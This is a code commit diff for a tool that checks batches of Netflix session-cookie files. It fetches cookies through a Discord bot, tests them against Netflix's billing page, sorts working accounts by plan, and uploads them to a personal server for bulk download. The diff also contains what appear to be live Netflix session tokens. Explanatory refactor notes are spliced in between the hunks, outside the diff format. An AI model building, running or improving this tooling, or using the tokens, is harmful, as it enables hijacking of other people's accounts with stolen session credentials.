Hashir Kashif committed on
Commit 4f424b2 · 1 Parent(s): ac3cc4b

asdasdasdasdas

Files changed (5)
  1. app.py +3 -3
  2. cookieFix.py +1 -1
  3. cookie_checker.py +122 -0
  4. cookiesLocal.txt +1 -0
  5. extract_all_membership.py +44 -0
app.py CHANGED
@@ -39,7 +39,7 @@ def send_retrieve_cookie_msg(channelid):
     data = {"content": "c.gen netflix"}
     headers = {"authorization": secret}
     r = requests.post(
-        "https://discord.com/api/v9/channels/1186365728278990938/messages",
+        "https://discord.com/api/v9/channels/1202341653961257031/messages",
         data=data,
         headers=headers)
     time.sleep(10)
@@ -155,7 +155,7 @@ def getNetflixInfo(cookiefile):
     fixCookie(newCookieFile)
     ftp,ssh_client = sftp_connect()
     files = ftp.put(newCookieFile,"./domains/hashir672.serv00.net/public_html/Membership/"+cookieFileName)
-
+
     print("uploaded ",files)
     # print('connection established successfully')
@@ -179,7 +179,7 @@ def getNetflixInfo(cookiefile):
 
 def mainTask():
     print("running cookie retriever")
-    send_retrieve_cookie_msg(1191381755731644418)
+    send_retrieve_cookie_msg(1239589658309034055)
     time.sleep(5)
     print("running netflix checker")
     os.chdir('./cookies/')
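
The first and third hunks swap hardcoded Discord channel IDs even though send_retrieve_cookie_msg() already receives a channelid parameter. A minimal refactor sketch (an assumption, not part of this commit) that builds the URL from the parameter so the ID lives only at the call site in mainTask(); `secret` is assumed to be the same module-level token app.py already loads:

import time
import requests

def send_retrieve_cookie_msg(channelid):
    # Derive the endpoint from the parameter instead of hardcoding an ID.
    data = {"content": "c.gen netflix"}
    headers = {"authorization": secret}  # assumes app.py's module-level token
    r = requests.post(
        f"https://discord.com/api/v9/channels/{channelid}/messages",
        data=data,
        headers=headers)
    time.sleep(10)  # give the generator bot time to respond
    return r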
cookieFix.py CHANGED
@@ -6,7 +6,7 @@ def fixCookie(cookiefile):
             break
         print(line.replace("\n",""))
 
-
+fixCookie("./cookiesLocal.txt")
 
 # cookies=[]
 
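
The new fixCookie("./cookiesLocal.txt") call sits at module level, so it also runs on import; if app.py imports fixCookie from this file (it calls fixCookie(newCookieFile) above), the local test would execute there too. A minimal sketch that guards the test call while leaving direct execution unchanged:

if __name__ == "__main__":
    # Only exercise the local test file when cookieFix.py is run directly.
    fixCookie("./cookiesLocal.txt")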
 
cookie_checker.py ADDED
@@ -0,0 +1,122 @@
+import re
+import requests
+from bs4 import BeautifulSoup
+from deep_translator import GoogleTranslator
+import glob
+import os
+import shutil
+import string
+import random
+import sys
+import time
+
+# Running tallies for the summary printed at the end of the script.
+loginPageCount = 0
+membershipCount = 0
+noMembershipCount = 0
+
+
+def parseCookieFile(cookiefile):
+    """Parse a cookies.txt file and return a dictionary of key value pairs
+    compatible with requests."""
+    cookies = {}
+    with open(cookiefile, 'r') as fp:
+        for line in fp:
+            if not re.match(r'^\#', line):
+                lineFields = line.strip().split('\t')
+                try:
+                    # Netscape layout: field 5 is the name, field 6 the value.
+                    cookies[lineFields[5]] = lineFields[6]
+                except IndexError:
+                    # Malformed line (separator, blank, wrong format): skip it.
+                    pass
+    return cookies
+
+
+def getNetflixInfo(cookiefile):
+    global loginPageCount
+    global membershipCount
+    global noMembershipCount
+    cookies = parseCookieFile(cookiefile)
+    r = requests.get("https://www.netflix.com/BillingActivity",
+                     cookies=cookies)
+    print(r.url)
+    if "login" in r.url:
+        # Redirected to the login page: the cookies no longer authenticate.
+        loginPageCount = loginPageCount + 1
+        print("Login Page")
+        os.remove(cookiefile)
+    else:
+        soup = BeautifulSoup(r.content, "html.parser")
+        try:
+            billingDate = soup.find("div", {
+                "data-uia": "streaming-next-cycle"
+            }).get_text()
+            planName = soup.find("div", {"data-uia": "plan-name"}).get_text()
+            billingDate = GoogleTranslator(source='auto',
+                                           target='en').translate(billingDate)
+            try:
+                soup.find("html", {"lang": 'en'}).get_text()
+                lang = "English"
+            except AttributeError:
+                lang = ""
+            planName = GoogleTranslator(source='auto',
+                                        target='en').translate(planName)
+
+            print(billingDate + " " + planName + " " + lang)
+            ran = ''.join(
+                random.choices(string.ascii_uppercase + string.digits, k=3))
+            os.makedirs("../Membership", exist_ok=True)
+            shutil.move(
+                cookiefile, "../Membership/" + billingDate + " " + planName +
+                " " + lang + " (" + ran + ").txt")
+            membershipCount = membershipCount + 1
+        except Exception:
+            # Billing details missing: logged in, but no active membership.
+            ran = ''.join(
+                random.choices(string.ascii_uppercase + string.digits, k=10))
+            os.makedirs("../NoMembership", exist_ok=True)
+            shutil.move(cookiefile, '../NoMembership/NoMember' + ran + ".txt")
+            noMembershipCount = noMembershipCount + 1
+
+
+n = 0
+try:
+    os.chdir('./cookies')
+except OSError:
+    print("Cookies folder not found!\nThe name of the cookie folder should be 'cookies'.\nClosing in 5 seconds...")
+    time.sleep(5)
+    sys.exit()
+for fileName in glob.glob("*.txt"):
+    n += 1
+    getNetflixInfo(fileName)
+
+if n == 0:
+    print("Cookie folder is empty")
+os.chdir('../')
+
+print("========================\nInvalid cookies: " + str(loginPageCount) +
+      "\nMembership Cookies: " + str(membershipCount) +
+      "\nValid cookies (no membership): " + str(noMembershipCount))
cookiesLocal.txt CHANGED
@@ -3,6 +3,7 @@
 .netflix.com TRUE / FALSE 1730077477 OptanonConsent isGpcEnabled=0&datestamp=Sun+Oct+29+2023+02%3A04%3A37+GMT%2B0100+(Mitteleurop%C3%A4ische+Normalzeit)&version=202301.1.0&isIABGlobal=false&hosts=&consentId=abd9331e-1568-44cd-8ce6-072c32644243&interactionCount=1&landingPath=NotLandingPage&groups=C0001%3A1%2CC0002%3A1%2CC0003%3A1%2CC0004%3A1&geolocation=DE%3BNI&AwaitingReconsent=false
 .netflix.com TRUE / FALSE 1733101477 dsca customer
 .netflix.com TRUE / FALSE 1730077477 nfvdid BQFmAAEBELH7oLMMcP4qNIw1f_9gpPZgFwmkdq5V-P-a1Hq1ZFqW60KFEHpUYb6xJjGt5ZBK_GFLa1W9rJaSLTd6GVhqKRmEWQFowHVUjMlVhx8Ebhdrv4yf266zxSi06G0wJyw3KzY-A8WdFbgjGtGc5g0Q4_Et
+==========
 .netflix.com TRUE / FALSE 1730143165 NetflixId ct%3DBQAOAAEBEFu9CsuEjjvziEwCyUANCn2B8IVAP2tWnbHE_b40ge9zNC4QTDk_kFWa2F4B72Xsz4UQjqb1indL4_N6vSa6CuGrMFT2GelG4OIW2wVJJBVbi8YWTQKMXL8edFhlIeFMuPvoqP0qlTnjHVI1hEogMJtJwZAds8qXYw7IxPL0pJc4RD6nxxezOOoHtP_TMWahGIhsPO_6Ojtx_31sTACOYKB1lnN0e0WYUHhFK5m8dXDO3X1VoOqxDRN5-94v13jK4TBkL35A9tFahDZX4mckoXrOAyDhMpl6IAh4dRhFtyDfiDHcBY-l-DSkX8P4Nhx6jFbKVJ7qRpT_nz7HNppBLq5BDbYc_1ufS79J1BChrcsLnLFrWZVKzOPs01GXLW24OMxpKfxsSZBcJP8oN405fA1UEIcTMix5pr-dsrPO-TrYJ5EllR-UAWEZQnMz8CGWG43EiXm67eI37jV59THe6xG4PorwNQK5KaeXlYktp9k8xh-SdZ3GG77KGyhV9JW6voK-VqxQvQn-DwQ8DDaVudy2wM2NKcYZ0F7zXxirJldvLe9rfxhPySxdqvTaI3AcNRlktC0rNG29CYrckDamyFB0lmvkIi1pa10kiCWhMKTr9qNR42XFluEgSaTmOyqTmsJs4UUIBziNqXTler37BSj2VJyEd0h0T5ck_BOCOuewm1A.%26bt%3Ddbl%26ch%3DAQEAEAABABRbxjyeE5FREGIwE5rtAlzHocxHFoqwwtE.%26v%3D2%26mac%3DAQEAEAABABR1CnxvONylg1xtOagmcZxKYMU6JjZBVts.
 .netflix.com TRUE / FALSE 1730143165 SecureNetflixId v%3D2%26mac%3DAQEAEQABABRNCFUUuYxsITZ_DxMYxMg5xmcRF3aEUOY.%26dt%3D1698607163380
 .netflix.com TRUE / FALSE 1706383166 hasSeenCookieDisclosure true
extract_all_membership.py ADDED
@@ -0,0 +1,44 @@
+import requests
+from bs4 import BeautifulSoup
+import os
+import aiohttp
+import asyncio
+import time
+
+start = time.perf_counter()
+
+
+def get_urls():
+    # Scrape the directory listing and collect the URL of every linked file.
+    url = 'https://hashir672.serv00.net/'
+    reqs = requests.get(url)
+    soup = BeautifulSoup(reqs.text, 'html.parser')
+
+    urls = []
+    for link in soup.find_all('a'):
+        file_link = link.get('href')
+        urls.append(url + file_link)
+    return urls
+
+
+urls = get_urls()
+os.makedirs("./extract_member", exist_ok=True)  # download target must exist
+
+
+async def download_file(url):
+    # Fetch one file and write it under ./extract_member/.
+    async with aiohttp.ClientSession() as session:
+        async with session.get(url) as resp:
+            with open("./extract_member/" + url.split("/")[-1], 'wb') as f:
+                f.write(await resp.read())
+
+
+async def main():
+    # Download all files concurrently.
+    await asyncio.gather(*[download_file(url) for url in urls])
+
+
+asyncio.run(main())
+
+print(f"Total time: {time.perf_counter() - start}")
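
asyncio.gather() here opens a fresh ClientSession and fires one request per URL all at once, which can exhaust sockets on a large listing. A sketch (an assumption, not part of this commit) that reuses a single session and caps concurrency with a semaphore:

import asyncio
import aiohttp

async def download_all(urls, limit=10):
    sem = asyncio.Semaphore(limit)  # at most `limit` requests in flight
    async with aiohttp.ClientSession() as session:
        async def fetch(url):
            async with sem:
                async with session.get(url) as resp:
                    data = await resp.read()
            with open("./extract_member/" + url.split("/")[-1], "wb") as f:
                f.write(data)
        await asyncio.gather(*[fetch(u) for u in urls])

# usage: asyncio.run(download_all(get_urls(), limit=10))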